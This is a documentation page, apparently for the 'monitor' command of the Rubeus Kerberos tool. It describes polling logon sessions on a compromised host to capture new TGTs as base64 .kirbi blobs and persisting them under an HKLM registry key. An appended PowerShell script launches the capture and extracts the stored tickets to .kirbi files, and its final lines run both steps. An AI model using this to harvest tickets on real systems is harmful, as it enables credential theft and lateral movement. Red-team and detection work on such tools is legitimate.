Documentation Index
Fetch the complete documentation index at: https://mintlify.com/ghostpack/rubeus/llms.txt
Use this file to discover all available pages before exploring further.
monitor runs a continuous polling loop that calls LsaEnumerateLogonSessions every /monitorinterval seconds (default 60) and compares the current set of TGTs against the previous snapshot. Whenever a new TGT appears, because a user logs on interactively, a service account authenticates, or a scheduled task runs, Rubeus immediately prints the ticket to the console as a base64-encoded .kirbi (KRB-CRED) blob. This is useful on a compromised host where you want to capture tickets as they flow through without repeatedly running dump by hand. The loop runs until the process is interrupted unless /runfor is specified. Seeing sessions that belong to other users requires an elevated process; from an unelevated process only the current user's own sessions are visible. Because polling is periodic, a logon session that starts and ends within a single interval can be missed, so shorten the interval when the sessions you are waiting for are short-lived.
Flags
/monitorinterval:SECONDS
How often (in seconds) to poll the logon session cache for new TGTs. Defaults to 60 seconds. The flag /interval is also accepted and behaves identically.
/filteruser:USER
Only report new TGTs belonging to the specified username. The flag /targetuser is also accepted and behaves identically. When omitted, all new TGTs are reported.
/nowrap
Print base64 ticket blobs without line wrapping, one blob per line. Makes output easier to process programmatically. No value required.
/registry:SOFTWARENAME
Persist captured TGTs to the registry under HKLM\SOFTWARE\<SOFTWARENAME> as each one is seen. Useful for surviving operator disconnects: the tickets can be retrieved later even after the monitoring process exits. Writing under HKLM also requires an elevated process.
/runfor:SECONDS
Stop monitoring after this many seconds. When omitted the loop runs indefinitely until the process is killed.
Examples
Monitor with the default 60-second interval
Start watching for new TGTs on all sessions (requires elevation):
Monitor with a 30-second polling interval
Reduce the interval for a more responsive capture window:
Monitor for a specific target user
Only display tickets for a named account, useful when waiting for a specific service account to authenticate:
Run for a limited time and exit
Capture for 10 minutes then stop automatically:

When /registry:SOFTWARENAME is supplied, Rubeus writes each captured TGT blob to HKLM\SOFTWARE\<SOFTWARENAME> as it arrives. This key persists across operator sessions and can be read back later with standard registry tools, making it a lightweight persistence mechanism for harvested tickets.
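The following PowerShell is an added example, not code from the Rubeus project or this page: a wrapper that reproduces the four monitor invocations above (with the elevation check the page calls for), plus a function that reads tickets persisted with /registry:SOFTWARENAME back out of HKLM\SOFTWARE\<SOFTWARENAME>. Assumptions not taken from the page: Rubeus.exe sits in the current directory; the account name and registry name used at the bottom are constructed; and since the page does not document the value layout Rubeus writes under the key, Get-PersistedKirbi walks every value under it and keeps any string that base64-decodes to a KRB-CRED.

```powershell
# Added example (not Rubeus's own code). Assumes .\Rubeus.exe and the flag
# names documented on this page. The registry reader is layout-agnostic
# because the key/value structure Rubeus uses is not documented here.

function Test-IsElevated {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Start-RubeusMonitor {
    [CmdletBinding()]
    param(
        [string]$RubeusPath = '.\Rubeus.exe',  # assumed location
        [int]$IntervalSeconds = 60,            # /monitorinterval (alias /interval)
        [string]$FilterUser,                   # /filteruser (alias /targetuser)
        [int]$RunForSeconds = 0,               # /runfor; 0 means run until killed
        [switch]$NoWrap,                       # /nowrap
        [string]$RegistryName,                 # /registry:SOFTWARENAME
        [string]$LogPath                       # optional copy of stdout for later parsing
    )
    if (-not (Test-IsElevated)) {
        throw 'monitor needs an elevated process to see other users'' logon sessions.'
    }
    $argList = @('monitor', "/monitorinterval:$IntervalSeconds")
    if ($FilterUser)          { $argList += "/filteruser:$FilterUser" }
    if ($RunForSeconds -gt 0) { $argList += "/runfor:$RunForSeconds" }
    if ($NoWrap)              { $argList += '/nowrap' }
    if ($RegistryName)        { $argList += "/registry:$RegistryName" }
    Write-Verbose ("{0} {1}" -f $RubeusPath, ($argList -join ' '))
    if ($LogPath) {
        # Tee keeps the console live while saving the blobs for later use.
        & $RubeusPath @argList 2>&1 | Tee-Object -FilePath $LogPath
    } else {
        & $RubeusPath @argList 2>&1
    }
}

function Get-PersistedKirbi {
    param(
        [Parameter(Mandatory)][string]$SoftwareName,
        [string]$OutDir = '.\kirbi'
    )
    $base = "HKLM:\SOFTWARE\$SoftwareName"
    if (-not (Test-Path $base)) { throw "No key at $base; was /registry:$SoftwareName used?" }
    $outFull = (New-Item -ItemType Directory -Force -Path $OutDir).FullName
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $seen = @{}
    $keys = @(Get-Item -Path $base) + @(Get-ChildItem -Path $base -Recurse -ErrorAction SilentlyContinue)
    foreach ($key in $keys) {
        foreach ($name in $key.GetValueNames()) {
            $value = $key.GetValue($name)
            if ($value -isnot [string]) { continue }
            $b64 = $value -replace '\s', ''                        # tolerate wrapped blobs
            if ($b64 -notmatch '^[A-Za-z0-9+/]+={0,2}$') { continue }
            try { $bytes = [Convert]::FromBase64String($b64) } catch { continue }
            # A .kirbi is a DER KRB-CRED: [APPLICATION 22], so the first byte is 0x76
            # (the familiar "doI..." prefix once base64-encoded).
            if ($bytes.Length -lt 2 -or $bytes[0] -ne 0x76) { continue }
            $hash = ([BitConverter]::ToString($sha.ComputeHash($bytes)) -replace '-', '').Substring(0, 16)
            if ($seen.ContainsKey($hash)) { continue }             # same ticket stored twice
            $seen[$hash] = $true
            $safe = $key.PSChildName -replace '[^\w\-]', '_'
            $file = Join-Path $outFull ("{0}_{1}.kirbi" -f $safe, $hash)
            [IO.File]::WriteAllBytes($file, $bytes)
            [pscustomobject]@{ Key = $key.Name; Value = $name; Bytes = $bytes.Length; File = $file }
        }
    }
}

# The examples from this page (run one at a time; the first three run until killed):
# Start-RubeusMonitor                                   # default 60-second interval
# Start-RubeusMonitor -IntervalSeconds 30               # 30-second polling
# Start-RubeusMonitor -FilterUser 'svc_backup'          # one account only (constructed name)
Start-RubeusMonitor -RunForSeconds 600 -NoWrap -RegistryName 'MonitorDemo' -LogPath .\tgts.txt
Get-PersistedKirbi -SoftwareName 'MonitorDemo' | Format-Table
```

The last two lines run a 10-minute capture that also persists to HKLM\SOFTWARE\MonitorDemo, then pull every stored ticket out as a .kirbi file. The 0x76 check is what separates ticket blobs from any other string value Rubeus or another program may have put under the key, and the hash-based dedupe means a ticket seen by several polls is written once.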